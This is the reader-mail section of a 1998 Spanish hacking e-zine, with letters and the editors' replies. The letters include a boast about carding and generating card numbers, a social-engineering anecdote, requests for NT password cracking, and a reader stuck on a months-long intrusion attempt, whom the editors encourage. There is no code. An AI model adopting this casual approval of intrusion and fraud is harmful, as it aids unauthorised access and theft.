- [ Lastima lo del web y esperamos oir de vosotros pronto y a ver si te
- animas y nos escribes algo ;-) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: "Angel" <r9r99@xxxxxxxxxxxxxx>
- Subject: Hola
-
- Estoy realizando un proyecto sobre virus que explicara
- como funcionan, con todo detalle en todas las plataformas
- existentes,
- os agradeceria cualquier tipo de informacion al respecto (en
- español), si teneis algo, sea lo que sea, por favor mandarmelo a:
-
- r9r99@xxxxxxxxxxxxxx
-
- Muchas gracias. En cuanto lo tenga terminado os lo enviare
- por si quereis publicarlo.
-
- <------>
-
- [ Pasate por nuestra seccion de VIRUS, que te sera muy util, y ya sabes
- estamos esperando tu articulo de virus. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: Usuari Escombra <ko@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: quiero colaborar
-
- Holas... me encanta vuestro e-zine... especialmete el 3 y el 4...
- porque el 1 es... como lo diriamos... un poco verde... pero de buen
- rollo..!
- Os escribo desde Barcelona.. (Spain) jajaja... pq aqui el tema esta muy
- candente... mi seudonimo es NoFace aunque este es nuevo ya que antes yo
- me hacia llamr NEXUS... sip uno de tantos pero quizas uno de los
- primeros... Tengo alguna experiencia en hackear sistemas Unix...
- y soy especialista en MACINTOSH... en eso no hay quien me gane aunque no
- pude superar el reto de Apple para hackear su pagina... me preguntaba si
- podria formar parte en la revista... Ah.. domino bastante de Carding
- algo me he sacado con las Visas y poseo el secreto de generar numeros
- con PELAS a partir de algun numero ya caducado.. me lo ensenyo un
- coleguilla que controla mucho... Me ofrezco a redactar todo tipo de
- articulos... de tema que sea escepto de Telefonia que poseo un
- conocmiento limitado...
- Opino que el Hack es uan forma de vida y como no una forma de pensar...
- Gracias y espero que me escribais. Diciendome si colaboro o no..? OK
- Venga animo y seguid asi que soys cojonudos e id con cuidado... EL GRAN
- HERMANO OS OBSERVA jejeje.. bueno os escribo desde la universidad POMPEU
- FABRA.. jeje infiltrado... jejej.... A ver si no me pillan un dia de
- estos... una vez me pillaron Intentando hackaer el server central... y
- me quede con el admin... jeje INGENIERIA SOCIAL...
- - no, mi crnet.. mmmm me lo he dejado en casa...
- _ no puedes estar aqui sin carnet... por cierto que haces.. ??
- _ Nada... nada...
- _ Fuera..
- _ y tu quien eres...??
- _ el admin..
- (cara de superioridad)
- _ A si? pues ensenyame el carnet ... (jejeje)
- _ ahora voy a buscarlo... pa chulo yo...
- (NoFace desaparece.. jejeje) anda buscame
-
- Bueno SALUDOS....... HACK THE WORLD IS FUCK THE WORLD
-
- XnexusX@xxxxxxxxxxxxxx <---- Ismael del servidor.. jejeervidor.. jeje
-
- <------>
-
- [ Pues los mienbros de la revista son los componentes de - J.J.F. / HACKERS
- TEAM - y es un grupo cerrado. Pero por supuesto puedes escribir lo que
- quieras que nosotros te lo ponemos encantados :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: Manuel-el oso <sambam@xxxxxxxxxxxxxx>
- To: sambam@xxxxxxxxxxxxxx
- Subject: el indio piel roja....
-
- La historia nos recuerda que en cierta ocasion el
- presidente de los Estados Unidos intento comprar
- el territorio ocupado por los indios. Para ello le hizo
- una proposicion al jefe indio "toro sentado".
- Y esta fue su respuesta:
-
- *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^
-
- CARTA DEL JEFE INDIO
-
- ¿Como se puede comprar o vender el firmamento, ni aun el calor de la
- tierra?. Dicha idea nos es desconocida. Si no somos dueños de la frescura
- del aire ni del fulgor de las aguas ¿Como podrian ustedes comprarlos? Cada
- parcela de esta tierra es sagrada para mi pueblo. Cada brillante mata de
- pino, cada grano de arena de las playas, cada gota de rocio en los oscuros
- bosques, cada altozano y hasta el sonido de cada insecto es sagrado a la
- memoria y al pasado de mi pueblo. La savia que circula por las venas de los
- robles lleva consigo las memorias de los pieles rojas.
- Los muertos del hombre blanco olvidan su pais de origen cuando
- emprenden sus paseos por las estrellas; en cambio, nuestros muertos nunca
- pueden olvidar esa bondadosa tierra, puesto que es la madre de los pieles
- rojas. Somos parte de la tierra y asi mismo, ella es parte de nosotros. Las
- flores perfumadas son nuestras hermanas; el venado, el caballo, la gran
- guila; estos son nuestros hermanos. Las escarpadas peñas, los humedos
- prados, el calor del cuerpo del caballo y el hombre, todos pertenecemos a
- la misma familia.
-
- Por todo ello cuando el Gran Jefe de Washington nos envia el mensaje
- de que quiere comprar nuestras tierras dice que nos reservar un lugar en el
- que podamos vivir confortablemente entre nosotros. El se convertir en
- nuestro padre y nosotros en sus hijos. Por ello consideramos su oferta de
- comprar nuestras tierras. Ello no es facil, ya que esta tierra es sagrada
- para nosotros.
- El agua cristalina que corre por los rios y arroyuelos no es
- solamente agua, sino, tambien, representa la sangre de nuestros antepasados.
- Si le vendemos nuestra tierra deben recordar que es sagrada y a la vez
- deben enseñar a sus hijos que es sagrada y cada reflejo fantasmagorico en
- las claras aguas de los lagos cuenta los sucesos y memorias de las vidas
- de nuestras gentes. El murmullo del agua es la voz del padre de mi padre.
- Los rios son nuestros hermanos y sacian nuestra sed; son portadores de
- nuestras canoas y alimentan a nuestros hijos. Si les vendemos nuestras
- tierras, ustedes deben recordar y enseñarles a sus hijos que los rios son
- nuestros hermanos y tambien lo son suyos y, por lo tanto, deben tratarlos
- con la misma dulzura con la que se trata a un hermano. Sabemos que el
- hombre blanco no comprende nuestro modo de vida. El no sabe distinguir
- entre un pedazo de tierra y otro, ya que es un extraño que llega de noche y
- toma de la tierra lo que necesita.
- La tierra no es su hermana, sino su enemiga, y una vez conquistada
- sigue su camino, dejando atras la tumba de sus padres sin importarle. Le
- secuestra la tierra a sus hijos. Tampoco le importa, tanto la tumba de sus
- padres como el patrimonio de sus hijos son olvidados. Trata a su madre, la
- tierra, y a su hermano, el firmamento, como objetos que se compran, se
- explotan y se venden como ovejas o piedras de colores. Su apetito devorar
- la tierra, dejando atras solo un desierto.
- No se, pero nuestro modo de vida es diferente al de ustedes. La sola
- visita de sus ciudades apenan los ojos del piel roja. Pero quiza sea por
- que el piel roja es un salvaje y no comprende nada.
- No existe un lugar tranquilo en las ciudades del hombre blanco, ni
- hay sitio donde escuchar como se abren las hojas de los arboles en primavera
- o como aletean los insectos. Pero quiza tambien esto debe ser porque soy
- un salvaje que no comprende nada. El ruido solo parece insultar nuestros
- oidos. Y despues de todo, ¿para que sirve la vida si el hombre no puede
- escuchar el grito solitario del chotacabras ni las discusiones nocturnas de
- las ranas al borde de un estanque?. Soy un piel roja y nada entiendo.
- Nosotros preferimos el suave susurro del viento sobre la superficie de
- un estanque, asi como el olor de ese mismo viento purificado por la lluvia
- del mediodia o perfumado con aromas de pinos. El aire tiene un valor
- inestimable para el piel roja, ya que todos los seres comparten un mismo
- aliento, la bestia, el arbol, el hombre, todos respiramos el mismo aire. El
- hombre blanco no parece consciente del aire que respira; como un moribundo
- que agoniza durante muchos dias es insensible al olor. Pero si les vendemos
- nuestras tierras, deben recordar que el aire nos es inestimable, que el
- aire comparte su espiritu con la vida que sostiene. El viento que dio a
- nuestros abuelos el primer soplo de vida tambien recibe sus ultimos
- suspiros. Y si les vendemos nuestras tierras, ustedes deben conservarlas
- como cosa aparte y sagrada, como un lugar donde hasta el hombre blanco
- pueda saborear el viento perfumado por las flores de las praderas.
- Por ello, consideramos su oferta de comprar nuestras tierras y si
- decidimos aceptarla yo pondre una condicion: el hombre blanco debe tratar a
- los animales de esta tierra como a sus hermanos. Soy un salvaje y no
- comprendo otro modo de vida. He visto a miles de bufalos pudrirse en las
- praderas, muertos a tiros por el hombre blanco desde un tren en marcha. Soy
- un salvaje y no comprendo como una maquina humeante puede importar mas que
- el bufalo, al que nosotros solo matamos para sobrevivir
- ¿Que seria del hombre sin los animales? Si todos fueran exterminados,
- el hombre moriria de una gran soledad espiritual; porque lo que suceda a
- los animales tambien le sucedera al hombre, todo va enlazado. Deben
- enseñarles a sus hijos que el suelo que pisan son las cenizas de nuestros
- abuelos.Inculquen a sus hijos que la tierra esta enriquecida con las vidas
- de nuestros semejantes a fin que sepan respetarla. Enseñen a sus hijos que
- nosotros hemos enseñado a los nuestros que la tierra es nuestra madre; y
- que todo lo que le ocurra a la tierra le ocurrira a los hijos de la tierra.
- Si los hombres escupen en el suelo, se escupen a si mismos. Esto sabemos:
- la tierra no pertenece al hombre; el hombre pertenece a la tierra. Esto
- sabemos: todo va enlazado, como la sangre que une una familia. Todo va
- enlazado.
- El hombre no tejio la trama de la vida; el solo es un hijo. Lo que
- hace con la trama se lo hace a si mismo. Ni siquiera el hombre blanco, cuyo
- Dios pasea y habla con el de amigo a amigo, queda exento del destino comun.
- Despues de todo quiza seamos hermanos. Ya veremos. Sabemos una cosa que
- quiza el hombre blanco descubra algun dia: nuestro Dios es el mismo Dios.
- Ustedes pueden pensar ahora que El les pertenece, lo mismo que desean que
- nuestras tierras les pertenezcan, pero no es asi. El es el Dios de los
- hombres y su compasion se comparte por igual entre el piel roja y el hombre
- blanco. Esta tierra tiene un valor inestimable para El, y si se daña se
- provocaria la ira del Creador.
- Tambien los blancos se extinguiran, quiza antes que las demas tribus.
- Contaminan sus lechos y una noche pereceran ahogados en sus propios
- residuos. Pero ustedes caminaran hacia su destruccion rodeados de gloria,
- inspirados por la fuerza de Dios que os trajo a esta tierra y que, por
- algun designio especial, les dio dominio sobre ella y sobre el piel roja.
- Ese destino es un misterio para nosotros, pues no entendemos por que se
- exterminan los bufalos, se doman los caballos salvajes, se saturan los
- rincones secretos de los bosques con el aliento de tantos hombres y se
- atiborra el paisaje de las exuberantes colinas con cables parlantes. ¿Donde
- esta el matorral? Destruido.
- ¿Donde esta el aguila? Desaparecio.Termina la vida y empieza la
- supervivencia.
-
- "Este mail esta echo con las ultimas neuronas de mi cerebro privilegiado, y
- debo mantenerlas por lo que no se volvera a leer ni a corregir las faltas
- ortograficas" Colaboracion por Pata.
-
- *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^
-
- <------>
-
- [ hhhhuuumm interesante, pero, ¿ que es ? ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: "Tono" <cmaragon@xxxxxxxxxxxxxx>
- Subject: Info
-
- Me gustaria que me dijeseis las IP de la web de LEOWORLD ya que actualmente
- esta con otra IP de la que vosotros habeis puesto.
- Y tambien si vosotros haceis lo mismo qie me dijeseis las IP por las que
- soleis poner vuestra web.
- NOTA: si no cambiais la IP olvidad lo 2nd
-
- vuestra pagina es la mejor que he encontrado en español , asi que no la
- jodais, y lo que mas me ha gustado ha sido el simbolo "phi" de la seccion
- de Crack.
-
- Stop.....................
-
- <------>
-
- [ ¿¿¿ La IP de LEOWORLD ???, y nosotros no cambiamos y si lo hacemos no te
- preocupes que te enteraras :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: default <default@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: hola desde el peru
-
- Que tal amigos me parece que estan haciendo un buen trabajo pero diganme
- como seria posible que yo pudiera adquirir un ejemplar
- respuestas al
- hepe@xxxxxxxxxxxxxx
-
- <------>
-
- [ Thx pero logicamente en nuestro web oficial y en nuestros distribuidores
- oficiales. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: "Juan Carlos" <j.tortola@xxxxxxxxxxxxxx>
- Subject: ezine para Conde Vampiro y Mac Crack Bishop
-
- Bueno tios el ezine es una pasada, desde luego estoy aprendiendo un huevo y
- parte del otro. A pesar de que soy un newbie, tengo ganas de comenzar en
- esto del mundo hack. Estoy realizando un generador de password aleatorio y
- con diccionario para claves de NT 4. Estas estan encriptadas con hash MD4 y
- necesito el codigo fuente de este algoritmo. Tambien necesito saber algo
- mas de como atacar en condiciones las particiones NTFS por que los programas
- PWdump y tal... Son un poco fuleros o por lo menos las versiones que yo
- tengo, solo permiten ver los directorios inutiles donde no hay nada
- interesante K:( Por cierto solo hablais de sistemas UNIX/LINUX, y muchos
- servidores funcionan con la basurilla del Sr. Bill Gates. La verdad es que
- no tengo mucha idea y creo que no puedo ofrecer una opinion real, sobre los
- Bugs del NT. Pero a un asi lo tengo en casa y ultimamente casca bastante.
- Me gustaria saber algunas cosas:
-
- - Teneis una BBS hack por la zona centro...
- - Que version de LINUX me recomendais.
- - Teneis intercambio de correo sobre desarroyo de hw y sw para realizar :-)
-
- Buneo no se se conseguire realizar algo guapo para el NT, de todas formas
- segun avance os envio codigo fuente y algunas pruebas para que lo
- publiqueis en el ezine, tengo intencion de adjuntar todos los programas
- posibles para hakear el sistema virus NT.
-
- A por cierto ya os he dicho que soy un newbie, pero tego ganas de ayudaros
- y aprender, si necesitais algo sobre electronica, micros, etc... podeis
- contactar conmigo.
-
- <------>
-
- [ Pues muchas gracias, ya sabemos que el ezine se a dedicado mucho a Unix,
- pero eso no significa que no trabajemos con NT, mas adelante iremos
- poniendo cosillas :)
- Para pillar cosas buenas de NT, te recomendamos los siguientes url∩s :
-
- http://l0pht.com/
- http://207.98.195.250/ (Rhino9)
- http://www.ntshop.net
- http://ciac.llnl.gov/ciac/ToolsUnixSig.html#Md4 Codigo del MD4
-
- Por desgracia no contamos con BBS, sobre Linux depende lo que quieras
- hacer y por el momento no tenemos mailing list pero estamos en ello.
- Pues ya sabes envianoslo cuando lo tengas listo, tenemos ganas de verlo. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: jaina7@xxxxxxxxxxxxxx (grieko)
- To: jjf_team@usa.net
- Subject: hola como estan
-
- saben su page esta muy bien pero baje un archivo que decia
- hackear page en español pero nada estaba en ingles
- espero que pronto lo pongan en español
-
- <------>
-
- [ Pues eso a sido un descuido del webmaster y ese documento no sera
- traducido por nosotros por lo que si alquien lo quiere traducir, pues ya
- sabe. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: c_plaza@xxxxxxxxxxxxxx
- To: jjf_team@usa.net
- Subject: informarles y agradecimiento
-
- un saludo antes que nada y gracias por la informacion que brindan a todos
- los cibernautas de este planeta.
-
- me dirijo en la oprtunidad de avisarles que tengo una pagina en la cual he
- utilizado fragmentos de sus composiciones asi como tambien les recomiendo a
- las personas que visiten mi pagina, que para mayor informacion se dirijan a
- la pagina de ustedes. mi pagina es
- http://www.geocities.com/Heartland/Plains/3102
-
- nota: espero que si esta en la posibilidad de ustedes me sirvan dar algunos
- consejos.
-
- att. Carlos Plaza
-
- <------>
-
- [ Okis :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: plaxius <plaxius@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: ííProyecto_R !!
-
- Hola estimados :
-
- Un gustazo saludarlos de nuevo , y felicitarlos ya que el numero cuatro
- estubo fantastico y parece que esto suma y sigue . Bueno solo queria
- contarles que ya hemos terminado el primer nuemro de
- Proyecto_R , los invito a que nos den su sincera opinion y criticas
- ojala constructivas , para que nos ayuden a mejorar ciertos aspectos del
- E-Zine la verdad es bastante pobre (creo yo ) pero tendra que
- ir mejorando a medida que se nos unan mas colaboradores . Les adjunto el
- primer numero y si puden poner un enlze desde vuestro web como tambien
- mencionar la direccion en su E-Zine , estaria eternamente agradecido ...
-
- URL Proyecto_R : http://www.bigfoot.com/~proyecto_r
-
- http://www.geocities.com/colosseum/sideline/9497
-
- GRacias ...----
-
- PlaXiuS .
-
- <------>
-
- [ Claro que os ponemos un enlace :) y a todos nuestros lectores decirles
- que pasaros por el url y pillad este nuevo ezine. Nos ha gustado mucho
- el ezine y esperamos que siga mejorando. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: "SPIDER" <jlcastil@xxxxxxxxxxxxxx>
- Subject: saludo
-
- Les envio un saludo, y felicitaciones por su magnifica pag.
-
- Espero que esto lo hagan aun mas grande, es genial
-
- hasta pronto...
-
- ATTE: SPIDERIDER
-
- <------>
-
- [ thx, estamos en ello. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sun, 02 Aug 1998 13:05:55 GMT
- From: "Alfredo Kreim" <the_argie@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: Ayuda
-
- Estimado Conde Vampiro: No soy ni H/P/C ni nada que se le parezca. Ni
- siquiera soy un Lamer. Mi actividad es el periodismo de investigacion
- (corrupcion politica, negociados turbios, etc.). Por supuesto que esto
- molesta a algunos y es por eso que me dirijo a uds. para preguntarles si
- me pueden dar alguna ayuda. Tengo mis lineas telefonicas pinchadas, o
- sea escuchan mis conversaciones. Algunas son importantes para descubrir
- cosas sucias y corren peligro mis fuentes de informacion si son
- identificadas. Mi requerimiento es: existe algun programa (tengo una
- Pentium 100 con Windows 95) que me permita escudriñar la linea y poder
- detectar si me estan grabando o interceptando la comunicacion?. De no
- existir, conocen algun diseño electronico que permita construir algun
- rastreador (que tenga componentes baratos ya que mi cuenta esta vacia)?.
- Es posible una vez detectado el hijo de puta fizgon mandarle algo para
- que no joda mas?. Desde ya les agradezco todo lo que puedan hacer para
- darme una ayuda. Lamento no saber Unix, y tambien lamento no ser mas
- joven. Ya cerca de los 50 me resulta un tanto pesado estudiar, aunque
- trato de leer algo nuevo de programacion todas las veces que puedo.
- Tengo la oportunidad ahora de leer un par de libros para empezar a
- programar en Java. Me gustaria me dieran su opinion si vale la pena o
- mejor me dedico a seguir persiguiendo politicos sucios. Por ultimo, mi
- ingles tecnico no es demasiado abultado, por ello si encuentran algo en
- castellano mejor. Un abrazo y sigan asi. Me gusta mucho leer la pagina
- JJF Hackers Team. Chau. Alfredo.
-
- <------>
-
- [ Esto me suena a peli de James Bond :), pues decirte que hay varias
- empresas que se dedican a estos asuntos. En barcelona y en Madrid tienes
- unas tiendas llamadas LA TIENDA DEL ESPIA, en la que podras comprar
- encriptadores para las conversaciones telefonicas y mas juguetes.
- Y que no te cojan alfredo :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Tue, 04 Aug 1998 19:03:52 GMT
- From: Sergio <carlos29@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: Hola COnde
-
- Hola soy Sergio y me interesaria un buen programa para pasarme los
- passwords que me piden las web porno, tengo WINDOWS95 ya me diras
- alguna cosa gracias soy carlos29@xxxxxxxxxxxxxx Adios
-
- <------>
-
- [ Por favor !!!!! tenemos mejores cosas que hacer. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: "Pablo Garcia del Pino" <icelord@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: Problemas en tus URL
-
- Tio:
-
- Muy buena pagina la tuya pero... cuando vas a bajarte por ejemplo los tonos
- de la red-box, informacion para red-box etc... Te encuentras el error 404
- es decir que el link de URL no existe.
- Por favor, este tema me interesa bastante, con lo que a ver si pudierais
- enviarme estos archivos, o si no decirme como conseguirlos.
-
- Gracias.
-
- Icelord
-
- http://www.pasanet.es/usuarios/icelord/
-
- icelord@xxxxxxxxxxxxxx
-
- <------>
-
- [ Ya decimos que los link∩s en los web∩s son dificl de mantener, pero
- el webmaster hace lo que puede. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Fri, 14 Aug 1998 18:45:35 GMT
- From: Cain <Nod@xxxxxxxxxxxxxx>
- To: jjf_team@usa.net
- Subject: Para el e-zine ( Correo del lector)
-
- Sonara muy tipico.. pero felicidades por vuestra pagina, y gracias por
- enseñarnos.... Bueno mejor voy al grano ok? Bien en el e-zine he visto
- que explicais cosas sobre el hacking, pero siempre bajo Unix. A alguien
- se le ha ocurrido la idea de hacerlo desde Windows? ( No os riais de mi
- please ) Soy consciente de que a muchos programadores la simple idea de
- trabajar con windows les parece ridicula, y que consideran que es un
- sistema para supernovatos... y tal vez sea asi, pero tambien es verdad
- que se puede hacer hacking desde windows ¿o no? La señorita Carolyn
- Meinel asi lo explica, y el señor IPgh0st hace la traducion de dichos
- documentos... entonces.. porque no se amplia mas sobre el tema? ¿Son
- conscientes de que para millones de usuarios, que usan Windows por
- motivos varios les seria mucho mas facil trabajar desde este "¿Sistema?"
- ( Lo pongo entre comillas para que nadie se me ofenda ok?) Bueno pues lo
- dicho, creo que seria interesante abarcar esa posibilidad, aqunue soy
- consciente que es una tarea un tanto pesada... Igualmente estoy
- convencido que se haria un gran favor a los aprendices de hackers (
- Incluyendome entre ellos).
- Gracias por dedicar su tiempo a mi e-mail, y espero seguir
- disfrutnado de su informacion, y de sus sabios consejos.
-
- And he exilied me
- To wander in darkness
- The land of Nod
- I flew into the darkness
- I saw no source of light
- And I was afraid
- And Alone.
-
- Fragment of Book of Nod.
-
- Cain.
-
- <------>
-
- [ Thx, ¿ Pero quien dice que no tocamos nada sobre windows ?, pues
- seguro que este numero te gustara :), ademas nosotros estamos trabajando
- en varios proyectos para windows que iran saliendo durante este año.
- Pero esperamos que los lectores tambien nos envien articulos sobre
- windows. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Mon, 17 Aug 1998 19:28:58 GMT
- From: "ZeD" <ZeD@xxxxxxxxxxxxxx>
- Subject: varias cosas
-
- hola os mando esto para deciros varias cosas,la primera es que lei una
- carta de un lector en el nº5 de la revista,que decia que le gustaria que en
- vuestro e-zine saliese una especie de "dicciohack",la verdad es que no me
- parece mala idea,ya que muchos de los terminos que se usan cambian de
- nombre y ademas no siempre se conocen todos,ya que salen nuevos cada muy
- poco tiempo.
-
- en segundo lugar queria comentar a todos los que os escriben diciendoos que
- quieren aprender hackear,que si lo haces bien,le pones empeño ypor supuesto
- no es una "vena" transitoria de esas que nos dan a todos de vez encuando
- despues de leer o ver alguna azaña en television o en algun periodico,no es
- tan dificil aprender y desde este como desde muchos e-zines y webs podeis
- ir aprendiendo (poco a poco claro,esto noes algo que se prenda en dos
- semanas),existen mogollon de libros sobre seguridad informatica,sistemas
- operativos...ect... que si los lees,puedes parender muchas cosas,ademas ¿no
- dicen que en internet esta todo? pues buscad guias de iniciacion o
- documentos para "newbyes" (o como coñe se scriba la palabreja esa).
-
- la tercera cosa que queria comentaros es una cuestion que me preguntaron el
- otro dia en un canal de irc y la verdad es que no supe contestarte,la
- pregunta que me hicieron es la siguiente:
- "¿se puede hackear (se referia a entrar en un sistema,obviamente) desde
- windows95?" yo la verdad es que no lo se y apartir de que me hizieran esa
- pregunta,a mi tambien me corroe la curiosidad,como ya se que si se puede no
- vais a decir el como,no os lo pregunto,simplemente me gustaria un "si" o
- un "no" ;-)
-
- mas cosillas,como decis vosotros sin colaboracion no hay trabajo,por lo
- tanto les mando tres textos para que,si quereis los incluyais en el proximo
- nº de vuestro e-zine.el primero es sobre como trucar el windows95,aqui
- explico la manera de adecuar el SO mas utilizado (por desgracia o por
- fortuna,segun para quien),al gusto del usuario y no al de los creadores del
- jodio sistema en cuestion.
- el segundo es una especie de guia para el irc en la que explico como
- conseguir cosas (contraseñas...etc...) por medio de ingenieria
- social,tambien incluye una pequeña guia de como usar dos de las tools que
- hay para los famosos PWL.
- el tercer texto va dedicado a los phreackers novatos o gente que se quiera
- iniciar en este campo,entre las cosas que se comentan en este texto incluyo
- una descripcion de algunas de la BOX mas conocidas.os los mando los 3
- comprimidos en un zip para que ocupen menos y no tardeis mucho en bajaros
- este e-mail.
-
- deciros que soy miembro del grupo HaCk`S-wEb-RiNg y que siempre que sale un
- nuevo nº de vustro e-zine lo pillamos rapidamente por que mola mazo y
- deciros que en nombre de todo el grupo,os mandamos un saludo,si quereis
- visitar nuestra web....
- lo llevais claro por que todavia esta "under construccion" pero ya le falta
- menos y cuando este acabado en los link`s pondremos uno a vuestra web,que
- mola mazo ¿fale? :-)
-
- por cierto (ya acabo) en algunos e-zines (no voy a decir cuales) tienen una
- "lista de correo" en la que avisan cuando sale un nuevo nº ¿por que no
- haceis vosotros lo mismo?
-
- bueno siento averos dado la barrila pero he tardado en decidirme a
- escribiros y ahora lo suelto todo de golpe ;-)
- un saludo y feliz HaCk (esto me suena) bye
-
- { ZeD ----- http://www.angelfire.com/ak/HACKZED/ZED2.html ------ }
- esta es la direccion de mi web,por si la quereis poner en el e-zine
-
- <------>
-
- [ Sobre un diccionario hack ya hemos pensado sobre ello y mas adelante ya
- veras :) Decirte sobre win95 "SI". Sobre el mailing list estamos en ello,
- pero no hemos dicho nada ya que dentro de poco habra cambios radicales en
- el website ;-)
- Thx por tus artis y nos gusta que otros grupos nos apoyen, saludos de
- - J.J.F. / HACKERS TEAM -, por cierto hemos visto tu ezine y tu web :)
- y decirte que este ezine se llama J.J.F. / HACKERS TEAM JOURNAL. byes ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- From: "Pepe Pepe2" <sir_ich@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Subject: Sir Ich
-
- Hola conde soy Sir Ich, estoy leyendome los articulos que realizas sobre
- hackers y quisiera saber si podrias decirme algun texto mas donde
- empezar porque quiero aprender en esto del hack.
-
- Por cierto me gustaron bastante tus articulos.
-
- Lo que me gustaria es que me enseñaras o que me dieras consejos o textos
- sobre como empezar en esto del hack.
-
- Bueno sin mas me despido hasta la proxima esperando tu respuesta.
-
- Muchas gracias por leer esta carta y por haberme atendido.
-
- Mi correo es sir_ich@xxxxxxxxxxxxxx
-
- <------>
-
- [ Bueno pues logicamente tienes nuestro/vuestro ezine que es un medio ideal
- para aprender, pero no solo de textos vive el hacker :)
- Nuestro consejo es el de siempre, estudia, aprende y mejora las cosas. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Tue, 18 Aug 1998 16:54:02 GMT
- From: "Alfredo Kreim" <the_argie@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
- Cc: mr.electro@usa.net
- Subject: Ayuda
-
- Muchachos, estoy en un problema. Soy periodista y hago notas
- investigando a politicos corruptos, policias corruptos, jueces
- corruptos, en fin, a toda la lacra que anda dando vueltas por ahi.
- Descubri que me pinchan mis lineas telefonicas y escuchan y graban mis
- conversaciones, lo que -por supuesto- me jode y ademas pone en riesgo a
- mis informantes (gente decente que cree que los hijos de puta tienen que
- estar en una jaula y los buenos disfrutar la vida). Primera pregunta:
- ¿hay algun programa que me permita descubrir con certeza la pinchadura y
- localizar al espia?. Segunda pregunta: Si existe, ¿es posible bloquear e
- impedir que me escuchen y graben?. Tercera pregunta: ¿Hay manera de
- romperles el culo cagandoles el equipo que estan usando?. Cuarta
- pregunta: Si todo lo anterior es negativo, ¿habra por ahi planos y
- manuales en castellano para construir algun aparatito electronico que
- realice la tarea descripta mas arriba?. Si necesitan mas datos acerca
- del tipo de central y equipos que tiene la proveedora del servicio
- telefonico, avisenme que lo averiguo y se los paso. Muchas gracias desde
- ya, y quedo a la espera de alguna novedad de uds. Un abrazo.
- Alfredo
-
- <------>
-
- [ Otra vez el espia !!! Pues ya te hemos dado la respuesta mas arriba, y
- estas cosas si que se pueden realizar pero tienes que ser un manitas en
- phreaking y por supuesto electronica, hhhuum cosa que veo dificil. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sun, 23 Aug 1998 15:30:31 GMT
- From: "ADRIAN" <admar@xxxxxxxxxxxxxx>
- Subject: me_gusta_mucho_la_presentacion__
-
- Bueno tienen un monton de programas buenisimos,y actuales, se ven poco por
- la red asi que sigan adelante muchachos ,otra cosa me mandan la direccion
- de la pagina en internet?
- es que la encontre en un buscador cabron que no me deja ver la direccion..
-
- <------>
-
- [ Pues facil, cuando te pones encima de nuestro enlace en ese buscador
- seguro que te sale nuestro url abajo a la izquierda en tu navegador.
- Ademas si pinchas encima te sale nuestro url en el prompt del navegador
- y encima nuestro url sale en nuestro ezine, creo que mas facil no se
- puede :) ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sat, 29 Aug 1998 08:20:37 GMT
- From: "Ana Maria Hermida" <ahermida@xxxxxxxxxxxxxx>
- To: conde_vampiro@usa.net
-
- Hola
-
- Estoy algo desesperado y no se que hacer. Llevo mas de 5 meses
- intentando entrar en un server.
- He sacado mucha informacion sobre los ordenadores que estan en su red
- (tengo mas de 20) y sobre
- los protocolos que otiliza en cada uno de sus puertos, asi como los
- dorectorios que exporta.
- Pero parece que todas las versiones estan libres de bugs ... que puedo
- hacer? como podria
- entrar en alguno de esos server? En todos los manuales y articulos de
- las revistas pone que
- es muy facil y blablabla pero yo no consigo nada ... y eso que tengo
- buenos conocimientos de
- informatica :(
-
- Me puedes echar una mano? gracias
-
- <------>
-
- [ Pues que decir, no conozco ningun sistema perfecto libre de bugs.
- No estaras enfocando correctamente la situacion, revisa a fondo toda la
- informacion que has recopilado. Pero si tan frustado estas mejor dejalo,
- en el hack no todo son alegrias y exitos. ]
-
- <────────────────────────────────────────────────────────────────────────────>
-
- Date: Sat, 29 Aug 1998 09:57:42 GMT
- From: "ZeD" <ZeD@xxxxxxxxxxxxxx>
- Subject: virus muy raro
-
- hola vereis no se si os acordareis de mi (os mande tres textos hace una dos
- o tres semanas) tengo un "pequeño" problema con algo que creo puede ser un
- virus a ctualmente estoy usando el WINDOWS95 y hoi (29/8/98) se me a
- activado lo que creo puede ser un virus lo que hace este es lo siguiente
- al abrir cualquier cosa con el NOTEPAD (solo con el note,con el wordpad no
- me pasa nada)
- la pantalla se me llena de iconos de error (el del windows que es un
- circulo rojo con una "X" blanca en medio)
- estos los puedo "borrar" si paso por encima de ellos el documento que he
- abierto
- me pasa lo mismo cuando intento conectarme a internet y tambien los puedo
- borrar si paso el cuadro de dialogo
- (el de "conectando a internet") por encima de ellos.
- actualmente uso el antivirus ANYWARE y este no me detecta nada raro y la
- verdad no se de que virus se puede trar y mucho menos como eliminarlo.
- yo la verdad es que de virus no tengo ni idea,por eso recurro a vosotros
- aver si,vosotros o alguno de vuestros lectores saben como poder ayudarme
